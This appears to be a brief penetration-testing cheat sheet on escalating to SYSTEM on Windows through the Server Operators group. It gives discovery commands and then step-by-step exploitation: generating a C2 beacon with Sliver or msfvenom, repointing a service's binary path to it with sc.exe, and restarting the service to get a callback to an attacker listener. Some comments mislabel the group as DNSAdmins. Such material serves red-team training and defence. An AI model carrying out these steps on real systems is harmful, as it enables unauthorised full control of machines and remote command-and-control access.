๐พ Overview
Members of the Server Operators group are able to modify services, this can be used to execute a malicious exe instead of a serviceโs normal binary.
๐ Discovery
This requires a user in the Server Operators group.
# Check your user's groups
whoami /groups
# Use PowerView to find DNSAdmins
Get-NetGroupMember -Identity "Server Operators"
# Use PowerShell to find DNSAdmins
Get-ADGroupMember -Identity "Server Operators"๐ Exploitation
First youโll need to generate a payload to execute, ideally a beacon from Sliver, msfvenom, or another C2 framework.
Next, use PowerShell to edit an existing service to execute your beacon.
# Change the binary path
sc.exe config [SERVICE NAME, EX. "VSS"] binpath=[FULL PATH TO BEACON]
# Ensure you have a listener running on your host
# Restart the service, this should get you a callback
sc.exe stop [SERVICE NAME]
sc.exe start [SERVICE NAME]This should get a callback as NT AUTHORITY\SYSTEM.
๐ Resources
| ๐ Hyperlink | โน๏ธ Info |
|---|---|
| Hacktricks | Privileged Groups Privesc |
| HackingArticles | Server Operators Privesc |